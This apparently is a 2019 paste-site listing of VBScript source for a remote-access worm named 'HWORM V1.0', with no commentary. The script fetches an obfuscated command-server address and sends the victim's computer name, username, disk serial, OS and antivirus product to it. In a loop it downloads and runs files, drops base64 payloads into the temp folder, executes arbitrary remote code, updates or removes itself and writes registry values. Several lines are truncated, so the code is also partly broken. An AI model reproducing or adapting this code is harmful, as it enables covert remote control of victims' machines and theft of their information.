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Apr 21st, 2019
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  1. On error resume Next
  2. j = array("WScript.Shell","Scripting.filesystemobject","Shell.Application","msxml2.xmlhttp","")
  3. g = array("HKCU","HKLM","HKCU\System\CurrentControlSet\défault","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
  4. y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")
  5. H=host
  6. Set w = WScript
  7. set sh = Cr(0)
  8. set fs = Cr(1)
  9. Set o=Cr(3)
  10. Set st = Cr(4)
  11. vn=" jjj"
  12. U=""
  13. ch = chrw(34)
  14. c = chrw(92)
  15. fu = w.scriptfullname
  16. wn=w.scriptname
  17. NT="-"
  18. function go(m)
  19. if m=4 then
  20. Set B=GetObject(y(3)).InstancesOf(y(4))
  21. for each a in b
  22. go=a.displayName
  23. exit for
  24. next
  25. Set B=GetObject(y(3) & "2").InstancesOf(y(4))
  26. for each a in b
  27. go=a.displayName
  28. exit for
  29. next
  30. if go="" then go="Not-found"
  31. else
  32. Set B=GetObject(y(0)).InstancesOf(y(m))
  33. for each a in b
  34. if m = 1 then
  35. go=a.volumeserialnumber
  36. elseif m = 2 then
  37. go=a.caption
  38. end if
  39. exit for
  40. next
  41. end if
  42. end function
  43. Function host
  44. Dim oXMLHTTP
  45. Dim oStream
  46. Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP.3.0")
  47. oXMLHTTP.Open "GET", decrypt("\DA@@);?EQ@GQR\^=P[]:BRD;ZM#PkW#f","405033"), False
  48. oXMLHTTP.Send
  49. If oXMLHTTP.Status = 200 Then
  50. host = oXMLHTTP.responseText
  51. End If
  52. End Function
  53. Function Cr(N)
  54. Set Cr = CreateObject(j(N))
  55. End Function
  56. function Ex(s)
  57. Ex = sh.ExpandEnvironmentStrings(s)
  58. end function
  59. function Pt(C,A)
  60. Pt=""
  61. Set X=Cr(3)
  62. X.Open "POST","http://"&H&"/"&C,false
  63. X.setrequestheader "User-Agent:",information
  64. X.send A
  65. Pt=X.responsetext
  66. set X=nothing
  67. end Function
  68. function information
  69. on error resume Next
  70. Set f = fs.GetFile(fu)
  71. inf = ""
  72. if inf = "" then
  73. inf = go(1) & spl
  74. inf = inf & vn & NT & spl
  75. inf = inf & ex("%computername%") & spl
  76. inf = inf & ex("%username%") & spl
  77. inf = inf & go(2) & spl
  78. inf = inf & "HWORM V1.0" & spl
  79. inf = inf & go(4) & spl
  80. inf = inf & U & "!"& FormatDateTime( f.DateCreated,2)
  81. information = inf
  82. else
  83. information = inf
  84. end if
  85. end Function
  87. Sub Ns
  88. on error resume next
  89. If fs.FileExists(dr) Then
  90. else
  92. '%ScTk%
  95. End If
  96. end Sub
  99. if fs.fileexists(ex("%Windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
  100. NT="+"
  101. end if
  102. U= sh.regread(g(2))
  103. if U="" then
  104. if mid(fu,2)=":\" & wn then
  105. U="TRUE"
  106. sh.regwrite g(2), U, g(4)
  107. else
  108. U="FALSE"
  109. sh.regwrite g(2), U, g(4)
  110. end if
  111. end if
  112. spl="123139C2C7E5870FC4"
  113. while true
  114. s=split(Pt("47FE1305DAAEEB70",""),spl)
  115. select case s(0)
  116. Case "5DF0AEAF4F15BFB1"
  117. sitedownloader s(1),s(2)
  118. Case "5DF59151AA"
  119. sleep = Eval (s(1))
  120. case "excecute"
  121. execute s(1)
  122. case "5DFCDC52"
  123. Dim mfile
  124. outFile = Ex("%temp%") & "\" & s(2)
  125. mfile = decodeBase64(s(1))
  126. writeBytes outFile, mfile
  127. sh.Run outFile,0,True
  128. case "7C6D51"
  129. set wr = fs.OpenTextFile(fu,1)
  130. f = wr.ReadAll
  131. wr.close()
  132. f = replace(f,vn,s(1))
  133. set wr = fs.OpenTextFile(fu,2,false)
  134. wr.Write f
  135. wr.close()
  136. "wscript.exe //B " & ch & fu & ch, 6
  137. w.quit
  138. case "5B85AF42E710"
  139. set wr = fs.OpenTextFile(fu,2,false)
  140. wr.Write s(1)
  141. wr.Close()
  142. "wscript.exe //B " & ch & fu & ch, 6
  143. pt "47FE130239B49532F5",""
  144. w.quit
  145. case "6DD6"
  146. W.quit
  147. case "5B9BBEE44B148293C9"
  148. S(1) = replace(S(1),"%f",fu)
  149. S(1) = replace(S(1),"%n",wn)
  150. S(1) = replace(S(1),"%sfdr",dr)
  151. pt "47FE13022765F07788190657",""
  152. execute S(1)
  153. w.quit
  154. end Select
  155. W.Sleep 4000
  157. Ns
  158. Wend
  159. Sub sitedownloader (fileurl,filename)
  160. strlink = fileurl
  161. strsaveto = Ex("%temp%") & "\" & filename
  162. "get", strlink, False
  163. o.send
  164. If fs.fileexists (strsaveto) Then
  165. fs.deletefile (strsaveto)
  166. End If
  167. If o.status = 200 Then
  168. With st
  169. .type = 1
  170. .open
  171. .write o.responsebody
  172. .savetofile strsaveto
  173. .close
  174. End With
  175. Set st = Nothing
  176. End If
  177. If fs.fileexists(strsaveto) Then
  178. fs.getfile (strsaveto).shortpath
  179. End If
  180. End Sub
  181. private function decodeBase64(base64)
  182. dim DM, EL
  183. Set DM = CreateObject("Microsoft.XMLDOM")
  184. Set EL = DM.createElement("tmp")
  185. EL.DataType = "bin.base64"
  186. EL.Text = base64
  187. decodeBase64 = EL.NodeTypedValue
  188. end Function
  189. private Sub writeBytes(file, bytes)
  190. Dim binaryStream
  191. Set binaryStream = CreateObject("ADODB.Stream")
  192. binaryStream.Type = 1
  193. binaryStream.Open
  194. binaryStream.Write bytes
  195. binaryStream.SaveToFile file, 2
  196. End Sub
  197. function decrypt(Data, key)
  198. Dim I, Z
  199. Dim C
  200. Dim Code
  201. Dim Result
  203. Result=""
  204. if len(Data) > 0 then
  205. Z=len(key)
  206. for I = 1 to len(Data)
  207. Code=Asc(mid(key, ((I - 1) mod Z + 1)))
  208. if Asc(Mid(Data, I, 1)) >= 128 then
  209. C= Chr(Asc(Mid(Data, I, 1)) xor (Code and &H7F))
  210. elseif Asc(Mid(Data, I, 1)) >= 64 then
  211. C= Chr(Asc(Mid(Data, I, 1)) xor (Code and &H3F))
  212. elseif Asc(Mid(Data, I, 1)) >= 32 then
  213. C= Chr(Asc(Mid(Data, I, 1)) xor (Code and &H1F))
  214. else
  215. C=Mid(Data, I, 1)
  216. End If
  217. Result=Result & C
  218. next
  219. end if
  220. decrypt = Result
  221. End Function
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